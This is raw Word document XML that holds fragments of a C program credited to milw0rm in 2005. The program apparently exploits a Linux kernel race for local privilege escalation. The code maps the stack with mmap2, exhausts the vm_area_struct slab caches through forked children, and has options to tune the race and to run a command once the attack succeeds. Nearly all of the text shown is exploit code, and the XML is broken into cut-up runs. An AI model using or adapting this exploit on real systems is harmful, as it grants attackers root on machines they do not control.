        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF92EC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 = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883693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 xml:space="preserve">       MAP_PRIVATE|MAP_ANONYMOUS, 0, 0</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746871A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1==p) fatal("mmap2 stack", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC9AC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 += STACK_SIZE - 64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2AF4BF" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FC3A8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__asm__("movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%%esp, %0</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DF92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 xml:space="preserve">"movl </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%1, %%esp</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D0CA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 : "m"(old_esp), "m"(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274B9D0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1AD37254" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD5CC1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epare_finish();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71047F4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54949619" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634F10ED" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4937C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chldcnt(int v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ECB0E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D4BFE0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cnt++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675E8BC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3125DED0" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E192E7" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCD6A6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alloc slab objects...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F76E97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line void do_wipe()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE89A4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974952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r, c=0, left=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889D0F5" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2202C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__asm__("movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%%esp, %0" : : "m"(old_esp) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D22401" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BBF06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old_esp = (old_esp - PGD_SIZE+1) &amp; ~(PGD_SIZE-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A01DE6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old_esp = map_base? map_base : old_esp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD15F7" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45007FB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or(;;) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2F96C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left&lt;=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7EBD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left = get_slab_objs("vm_area_struct");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE0777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left &lt;= SLAB_THRSH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5755006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72FE45C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left--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC746D3" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF4BF3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map_flags ^= PROT_READ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A59053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old_esp -= PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429CD1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r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE01C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MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18885837"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MAP_FAILED == r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ACECC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2203797D" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A586DE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c&gt;SLAB_PER_CHLD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DFBC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5531FE7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c%1024)==0 ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB823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if(!c) printf("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BEEB7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printf("\r    child %d VMAs %d", val, c);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C27B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fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256BADF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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE599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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0B74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7244C19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r    child %d VMAs %d", val, c);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C395B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flush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34549CC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kill(getppid(), SIGUSR1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0F305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or(;;) pause();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE86B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3A4235A1" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19102899" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF2378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empty SLAB caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3648BD2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wipe_slab()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DB18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9E1380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gnal(SIGUSR1, chldcnt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F3B2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 SLAB cleanup"); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFD6CD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for(;;) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45189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cnt=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD6AA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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>val++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3781E7B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pid = fork();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA3C0F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cpid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2E508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do_wipe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D4C0A9" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49EFD6E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hile(!ccnt) sys_sched_yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11144F0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 get_slab_objs("vm_area_struct") &lt;= SLAB_THRSH )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5327D99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3AD2615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33ED6CB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ignal(SIGUSR1, SIG_DFL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670C36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F064514" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E94DC3E" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD2176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void usage(char *n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D8C54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0C15F09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Usage: %s\t-f forced stop\n", n);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BCA88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t\t-s silent mode\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B0A2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t\t-c command to run\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2623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t\t-n SMP iterations\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE100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t\t-d race delta us\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131A8E2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t\t-w wait time seconds\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD2AD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t\t-l alternate lib name\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F05EE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t\t-a alternate addr hex\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176A38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intf("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D694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_exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CE22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732D84DA" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344E9B5A" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AAA4C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give -s for forced stop, -b to clean SLAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B808BB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main(int ac, char **av)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D878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43C55D4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int r;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059728DC" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130733C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hile(ac) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A011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r = getopt(ac, av, "n:l:a:w:c:d:fsh");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E8476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if(r&lt;0) break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B087D9C" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC783D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switch(r) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0418C0F8" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AFADF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f' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B23F6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fstop = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B36A490"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6A53FBDB" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F1EEB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s' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065F49A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silent = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109A6D5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0F61168C" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAAA2F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n' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AE11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smp_max = atoi(optarg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D9A61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28C49FF0" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3871C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d':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271FD5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if(1!=sscanf(optarg, "%u", &amp;delta_max) || delta_max &gt; 100000u )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0FE95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fatal("bad delta value", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F776B1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235398C9" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59192B9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w' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB02A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wtime = atoi(optarg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C916142"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if(wtime&lt;0) fatal("bad wait value", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D21B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5A12D27A" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F21754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l' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619DE2C9"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libname = strdup(optarg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011234B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327D9924" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1768BE31"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c' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855210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shellname = strdup(optarg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E1B73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423F9A9B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1AFCB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a' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D81C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if(1!=sscanf(optarg, "%x", &amp;map_base))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3148507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fatal("bad addr value", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4490CB"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map_base &amp;= ~(PGD_SIZE-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67739D3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59639FF9" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFCEE7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ase 'h' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B564C36"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default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B697C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usage(av[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA415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r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D913A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD3A2DE"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641BF72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consume_pid = fork();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4E76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p>
    <w:p w14:paraId="2B8E7DF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if (consume_pid == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14841A65"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2AF5531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consume_memory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2082186A"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pause();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF59A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r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4FFA0C"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D385AAD"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r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>basic setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB8128"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uid = getuid();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C969AF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setpgrp();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C4FCB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wipe_slab();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F7DF4"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ab/>
        <w:t>prepare();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2FB716" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408F785F"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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09A2E3" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBAB828" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A7708F" w14:textId="65379A44" w:rsidR="000B6516" w:rsidRPr="001703CE" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// milw0rm.com [2005-01-27]</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000B6516" w:rsidRPr="001703CE" w:rsidSect="007D5E7E">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F1009" w14:textId="77777777" w:rsidR="008308ED" w:rsidRDefault="008308ED" w:rsidP="009F0749">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
